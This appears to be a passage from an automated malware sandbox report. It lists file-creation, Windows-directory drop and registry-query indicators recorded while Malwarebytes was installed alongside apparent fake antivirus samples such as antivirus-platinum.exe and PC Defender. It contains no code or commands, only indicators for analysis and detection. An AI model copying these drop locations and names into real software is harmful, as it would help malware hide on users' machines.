| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\pl\UIAutomationClientSideProviders.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File opened for modification | C:\Program Files\Malwarebytes\Anti-Malware\ServiceConfig.json | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Text.RegularExpressions.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\cs\System.Xaml.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\es\UIAutomationProvider.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\it\Microsoft.VisualBasic.Forms.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\it\UIAutomationTypes.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\pl\Microsoft.VisualBasic.Forms.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\.version | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\Microsoft.CSharp.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Collections.NonGeneric.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Globalization.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Net.Security.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\cs\PresentationCore.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\de\UIAutomationClientSideProviders.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\vcruntime140_cor3.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File opened for modification | C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MBAMCore.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Net.Primitives.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Security.Principal.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\cs\PresentationUI.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\pt-BR\UIAutomationProvider.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\ReachFramework.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\Prism.Wpf.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\mbtun\mbtun.cat | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\ja\UIAutomationTypes.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\Prism.Container.Extensions.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\api-ms-win-core-console-l1-1-0.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Reflection.Primitives.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Security.Cryptography.Primitives.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\PresentationUI.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\pt-BR\System.Windows.Forms.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\tr\Microsoft.VisualBasic.Forms.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\zh-Hant\PresentationUI.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Net.NameResolution.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Resources.Reader.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Runtime.CompilerServices.Unsafe.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Text.Encodings.Web.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\de\PresentationCore.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File opened for modification | C:\Program Files (x86)\HjuTygFcvX | C:\Users\Admin\Desktop\[email protected] | N/A |
| File created | C:\Program Files (x86)\Security Central\Security Central.exe | C:\Users\Admin\Documents\[email protected] | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\de\System.Windows.Forms.Primitives.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\System.Security.Permissions.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\tr\System.Windows.Forms.Design.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnel_wireguard.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files (x86)\Def Group\PC Defender\Antispyware.exe | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.ValueTuple.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\es\PresentationCore.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\PresentationFramework.AeroLite.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\COMCTL32.OCX | C:\Users\Admin\Desktop\[email protected] | N/A |
| File opened for modification | C:\Windows\COMCTL32.OCX | C:\Users\Admin\Desktop\[email protected] | N/A |
| File opened for modification | C:\Windows\MSCOMCTL.OCX | C:\Users\Admin\Desktop\[email protected] | N/A |
| File opened for modification | C:\windows\antivirus-platinum.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\antivirus-platinum.exe | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\MSCOMCTL.OCX | C:\Users\Admin\Desktop\[email protected] | N/A |
| File created | C:\Windows\302746537.exe | C:\Users\Admin\Desktop\[email protected] | N/A |
| File opened for modification | C:\Windows\302746537.exe | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_3F16219B047CF8432B7ADA.exe | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_3F16219B047CF8432B7ADA.exe | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\antivirus-platinum.exe | C:\Users\Admin\Desktop\[email protected] | N/A |
| File opened for modification | C:\Windows\302746537.exe | C:\Users\Admin\Desktop\[email protected] | N/A |
| File created | C:\Windows\Installer\e71c4e8.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e71c4e8.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{FC2ABC8E-3715-4A32-B8B5-559380F45282} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\security\logs\scecomp.log | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\antivirus-platinum.exe | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIC601.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Windows\system32\mspaint.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_966CD4ED37489844400D0C.exe | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\{FC2ABC8E-3715-4A32-B8B5-559380F45282}\_966CD4ED37489844400D0C.exe | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\inf\oem3.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\inf\oem3.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\Installer\e71c4ec.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\__tmp_rar_sfx_access_check_241896593 | C:\Users\Admin\Desktop\[email protected] | N/A |
| File created | C:\Windows\antivirus-platinum.exe | C:\Users\Admin\Desktop\[email protected] | N/A |
| File created | C:\Windows\302746537.exe | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Documents\[email protected] |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\system32\vssvc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
